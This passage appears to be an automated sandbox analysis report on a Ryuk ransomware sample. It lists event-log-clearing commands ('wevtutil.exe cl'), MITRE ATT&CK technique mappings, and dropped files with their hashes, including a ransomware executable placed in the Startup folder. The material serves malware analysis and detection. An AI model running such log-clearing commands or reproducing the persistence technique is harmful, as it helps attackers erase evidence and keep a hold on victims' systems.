- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
    3⤵
    PID:820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
    3⤵
    - Clears Windows event logs
    PID:64
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
    3⤵
    PID:3356

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3724

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID

Filesize
8B

MD5
933d7ec82a73aca5dd0a05619e82e874

SHA1
f55dbc352e1dc285e514469d841f9eb371afb341

SHA256
cebf5d9b225cd17e012ea3a0e995fd1e6ef65edf18b7335769be7aee8e412c07

SHA512
2c8f76492a1c7caea0efa80614b89baff55748ea00c8191e646fdbe38acd3bed8dca69529c8ea3252930b414f56d99ff8df6223d8e128b22d69d2e12c75da3c0

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
23cb6bce418d720b600fb36625cea4df

SHA1
8f4018131e41187445688df8cbda01119efff157

SHA256
4ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136

SHA512
18bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
c15b6fa7298d73deeb3fb9fb3eba83c4

SHA1
be9c8af07d3e78226cc893d15058116331d27ed1

SHA256
3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302

SHA512
8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
c15b6fa7298d73deeb3fb9fb3eba83c4

SHA1
be9c8af07d3e78226cc893d15058116331d27ed1

SHA256
3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302

SHA512
8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
d80cc59347ae4e43809417a7120d75f5

SHA1
85934dbe2cec5c1d576a5e38b5e395534926dc9e

SHA256
7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9

SHA512
ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
d80cc59347ae4e43809417a7120d75f5

SHA1
85934dbe2cec5c1d576a5e38b5e395534926dc9e

SHA256
7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9

SHA512
ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
a57e1e6fe1c98d2e75799a46e9eb5797

SHA1
7878e7042c355546c118a38b90d8f7221f74d8a4

SHA256
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

SHA512
5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
933d7ec82a73aca5dd0a05619e82e874

SHA1
f55dbc352e1dc285e514469d841f9eb371afb341

SHA256
cebf5d9b225cd17e012ea3a0e995fd1e6ef65edf18b7335769be7aee8e412c07

SHA512
2c8f76492a1c7caea0efa80614b89baff55748ea00c8191e646fdbe38acd3bed8dca69529c8ea3252930b414f56d99ff8df6223d8e128b22d69d2e12c75da3c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
c15b6fa7298d73deeb3fb9fb3eba83c4

SHA1
be9c8af07d3e78226cc893d15058116331d27ed1

SHA256
3c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302

SHA512
8034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
d80cc59347ae4e43809417a7120d75f5

SHA1
85934dbe2cec5c1d576a5e38b5e395534926dc9e

SHA256
7f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9

SHA512
ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
a57e1e6fe1c98d2e75799a46e9eb5797

SHA1
7878e7042c355546c118a38b90d8f7221f74d8a4

SHA256
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

SHA512
5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

Download Submit
memory/216-190-0x0000000000000000-mapping.dmp

Download
memory/544-191-0x0000000000000000-mapping.dmp

Download
memory/620-139-0x0000000000000000-mapping.dmp

Download
memory/620-183-0x0000000000000000-mapping.dmp

Download
memory/716-151-0x0000000000000000-mapping.dmp

Download
memory/728-201-0x0000000000000000-mapping.dmp

Download
memory/772-198-0x0000000000000000-mapping.dmp

Download
memory/824-169-0x0000000000000000-mapping.dmp

Download
memory/948-178-0x0000000000000000-mapping.dmp

Download
memory/1056-150-0x0000000000000000-mapping.dmp

Download
memory/1104-205-0x0000000000000000-mapping.dmp

Download
memory/1164-173-0x0000000000000000-mapping.dmp

Download
memory/1252-143-0x0000000000000000-mapping.dmp

Download
memory/1292-138-0x0000000000000000-mapping.dmp

Download
memory/1424-182-0x0000000000000000-mapping.dmp

Download
memory/1520-174-0x0000000000000000-mapping.dmp

Download
memory/1656-206-0x0000000000000000-mapping.dmp

Download
memory/1676-145-0x0000000000000000-mapping.dmp

Download
memory/1832-154-0x0000000000000000-mapping.dmp

Download
memory/2012-181-0x0000000000000000-mapping.dmp

Download
memory/2180-189-0x0000000000000000-mapping.dmp

Download
memory/2264-155-0x0000000000000000-mapping.dmp

Download
memory/2296-153-0x0000000000000000-mapping.dmp

Download
memory/2344-149-0x0000000000000000-mapping.dmp

Download
memory/2368-176-0x0000000000000000-mapping.dmp

Download
memory/2412-148-0x0000000000000000-mapping.dmp

Download
memory/2424-194-0x0000000000000000-mapping.dmp

Download
memory/2492-192-0x0000000000000000-mapping.dmp

Download
memory/2724-185-0x0000000000000000-mapping.dmp

Download
memory/2996-167-0x0000000000000000-mapping.dmp

Download
memory/3004-184-0x0000000000000000-mapping.dmp

Download
memory/3100-193-0x0000000000000000-mapping.dmp

Download
memory/3356-203-0x0000000000000000-mapping.dmp

Download
memory/3392-186-0x0000000000000000-mapping.dmp

Download
memory/3428-147-0x0000000000000000-mapping.dmp

Download
memory/3468-199-0x0000000000000000-mapping.dmp

Download
memory/3556-175-0x0000000000000000-mapping.dmp

Download
memory/3672-202-0x0000000000000000-mapping.dmp

Download
memory/3764-159-0x0000000000000000-mapping.dmp

Download
memory/3768-179-0x0000000000000000-mapping.dmp

Download
memory/3772-170-0x0000000000000000-mapping.dmp

Download
memory/3856-163-0x0000000000000000-mapping.dmp

Download
memory/3884-137-0x0000000000000000-mapping.dmp

Download
memory/3892-156-0x0000000000000000-mapping.dmp

Download
memory/3948-160-0x0000000000000000-mapping.dmp

Download
memory/3956-132-0x0000000000000000-mapping.dmp

Download
memory/4100-177-0x0000000000000000-mapping.dmp

Download
memory/4184-144-0x0000000000000000-mapping.dmp

Download
memory/4192-140-0x0000000000000000-mapping.dmp

Download
memory/4212-196-0x0000000000000000-mapping.dmp

Download
memory/4212-180-0x0000000000000000-mapping.dmp

Download
memory/4268-146-0x0000000000000000-mapping.dmp

Download
memory/4320-197-0x0000000000000000-mapping.dmp

Download
memory/4332-195-0x0000000000000000-mapping.dmp

Download
memory/4360-142-0x0000000000000000-mapping.dmp

Download
memory/4368-204-0x0000000000000000-mapping.dmp

Download
memory/4556-187-0x0000000000000000-mapping.dmp

Download
memory/4572-171-0x0000000000000000-mapping.dmp

Download
memory/4772-188-0x0000000000000000-mapping.dmp

Download
memory/4836-133-0x0000000000000000-mapping.dmp

Download
memory/4860-134-0x0000000000000000-mapping.dmp

Download
memory/4936-152-0x0000000000000000-mapping.dmp

Download
memory/4976-136-0x0000000000000000-mapping.dmp

Download
memory/4992-200-0x0000000000000000-mapping.dmp

Download